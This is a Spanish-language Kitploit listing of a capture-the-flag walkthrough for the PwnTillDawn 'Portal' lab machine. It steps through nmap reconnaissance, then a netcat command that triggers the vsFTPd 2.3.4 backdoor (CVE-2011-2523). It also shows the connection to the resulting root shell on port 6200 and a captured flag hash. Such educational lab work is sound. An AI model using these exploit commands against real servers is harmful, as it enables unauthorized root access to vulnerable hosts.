Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
PwnTillDawn-Portal-Walkthrough — Una guía detallada de pruebas de penetración y un informe de explotación para la máquina 'Portal', centrados en CVE-2011-2523 (puerta trasera de vsFTPd 2.3.4) para lograr acceso root. | Kitploit
Herramientas/GitHubGitHub/tr00jan99/pwntilldawn-portal-walkthrough
Escalada de PrivilegiosReconocimientoAnálisis de VulnerabilidadesExplotaciónPost-ExplotaciónCTFPruebas de PenetraciónAprendizaje y Educación

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
GitHub
tr00jan99/pwntilldawn-portal-walkthrough

PwnTillDawn-Portal-Walkthrough

Una guía detallada de pruebas de penetración y un informe de explotación para la máquina 'Portal', centrados en CVE-2011-2523 (puerta trasera de vsFTPd 2.3.4) para lograr acceso root.

Ver Repositorio
hace 5 mesesAún no revisado

🔐 Evaluación de Vulnerabilidades y Pruebas de Penetración (VAPT)

📌 Proyecto: Recorrido de Explotación del Objetivo

⚠️ Este proyecto es solo para fines educativos y de pruebas autorizadas.
El acceso no autorizado a sistemas está estrictamente prohibido.


👨‍💻 Autor

SYAFIQ
Rol: Líder de Pruebas de Penetración


🎯 Información del Objetivo

  • IP del Objetivo: 10.150.150.12
  • Sistema Operativo: Ubuntu Linux
  • Estado: 🔴 CRÍTICO (Backdoor Detectado)
  • Vulnerabilidad: CVE-2011-2523 (Backdoor vsFTPd)

🧭 Resumen del Ataque

FaseHerramientaDescripción
DescubrimientoNmapEscanear la red para detectar hosts activos
EnumeraciónNmapIdentificar servicios y versiones
AnálisisScript NSEDetectar vulnerabilidad conocida
ExplotaciónNetcatActivar el backdoor
Post-ExplotaciónTerminalObtener acceso root y recuperar la bandera

🚀 Recorrido Paso a Paso

🔍 Paso 1: Reconocimiento de Red

Escanear la red para detectar hosts activos:

root@kitploit:~
nmap -sn --unprivileged 10.150.150.10-30

✅ Resultado:

-Se detectaron 8 hosts -Objetivo identificado: 10.150.150.12

🔎 Paso 2: Enumeración de Servicios

Escaneo de puertos y servicios abiertos:

root@kitploit:~
nmap -Pn -F --unprivileged -sV 10.150.150.12

✅ Hallazgos:

-Puerto 21 → FTP (vsftpd) -Puerto 22 → SSH (OpenSSH 8.2p1)

⚠️ Paso 3: Escaneo de Vulnerabilidades

Verificar la vulnerabilidad de backdoor FTP conocida:

root@kitploit:~
nmap -Pn --unprivileged -p21 --script ftp-vsftpd-backdoor 10.150.150.12

🚨 Resultado:

-El objetivo es VULNERABLE -CVE-2011-2523 confirmado

💣 Paso 4: Explotación

Activación del backdoor usando un nombre de usuario malicioso:

root@kitploit:~
(echo "USER hello:)"; echo "PASS password"; sleep 1) | nc -nv 10.150.150.12 21

⚡ Esto abre un shell root oculto en el puerto 6200

🔓 Paso 5: Obtener Acceso (Shell Root)

Conectarse al backdoor y ejecutar comandos:

root@kitploit:~
(echo "id; cat /root/FLAG1.txt"; sleep 1) | nc -nv 10.150.150.12 6200

✅ Resultado:

Acceso root obtenido uid=0(root) confirmado

🏁 Bandera Capturada:

root@kitploit:~
5ee499eb5d0b8e4269b13483e57adaa0b3815f48

🧠 Conclusiones Clave

Actualizar siempre los servicios obsoletos (vsFTPd era vulnerable) Los servicios mal configurados pueden comprometer todo el sistema Escaneos simples pueden revelar vulnerabilidades críticas -🛡️ Recomendaciones -🔄 Actualizar el servicio FTP a la última versión -🚫 Deshabilitar servicios innecesarios -🔐 Usar un firewall para restringir el acceso -📊 Realizar auditorías de seguridad periódicas -📚 Descargo de responsabilidad

Este proyecto está creado estrictamente para:

Aprender ciberseguridad Practicar hacking ético Realizar pruebas de penetración autorizadas

❌ NO uses este conocimiento para actividades ilegales.

⭐ Nota Final

“La seguridad no es un producto, sino un proceso.” — Siempre prueba, monitorea y mejora.

Descargar herramienta